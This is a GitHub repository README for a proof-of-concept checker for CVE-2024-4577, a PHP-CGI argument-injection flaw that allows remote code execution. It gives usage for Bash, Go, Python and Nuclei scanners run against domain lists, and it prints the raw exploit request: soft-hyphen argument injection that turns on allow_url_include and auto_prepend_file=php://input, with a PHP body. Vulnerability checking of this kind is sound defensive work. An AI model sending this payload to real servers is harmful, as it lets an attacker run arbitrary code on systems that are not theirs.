Skip to content

PHP RCE PoC for CVE-2024-4577 written in bash, go, python and a nuclei template

Notifications You must be signed in to change notification settings

ZephrFish/CVE-2024-4577-PHP-RCE

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

PHP RCE PoC

CVE-2024-4577: Argument Injection in PHP-CGI

Overview

This repository contains scripts to check for the CVE-2024-4577 vulnerability, an argument injection issue in PHP-CGI. You can use the provided Bash, Go, and Python scripts to test a list of domains for this vulnerability. I've also released a Nuclei YAML file.

Usage

Bash Script

To use the Bash script, run the following command:

./CVE-2024-4577.sh /path/to/domains-list

Go Script

First, save the Go script to a file named CVE-2024-4577.go. To build and run the Go script:

  1. Compile the Go script into a binary:

    go build -o CVE-2024-4577 CVE-2024-4577.go
  2. Execute the binary with the domain list file as an argument:

    ./CVE-2024-4577 /path/to/domains-list

Python Script

First, save the Python script to a file named CVE-2024-4577.py. To run the Python script:

  1. Ensure you have the requests library installed:

    pip install requests
  2. Execute the Python script with the domain list file as an argument:

    python CVE-2024-4577.py /path/to/domains-list
  3. (Optional) If you want to only print vulnerable hosts:

    python CVE-2024-4577.py /path/to/domains-list --quiet

Proof of Concept (POC) Explained

To manually test for the vulnerability, you can send the following POST request:

POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php phpinfo(); ?>

Nuclei Template

I've also created a Nuclei template to scan for vulnerable instances, it uses the v3 layout scheme and has been tested in a lab environment:

nuclei -t CVE-2024-4577.yaml -u <target-url>

Domain List Example

The list of domains should be pre-pended with http/https to ensure they are read correctly.

http://example.com
http://testsite.com
http://vulnerablesite.com

Example Output

If a domain is found to be vulnerable, the output will be:

http://example.com: Vulnerable
http://vulnerablesite.com: Vulnerable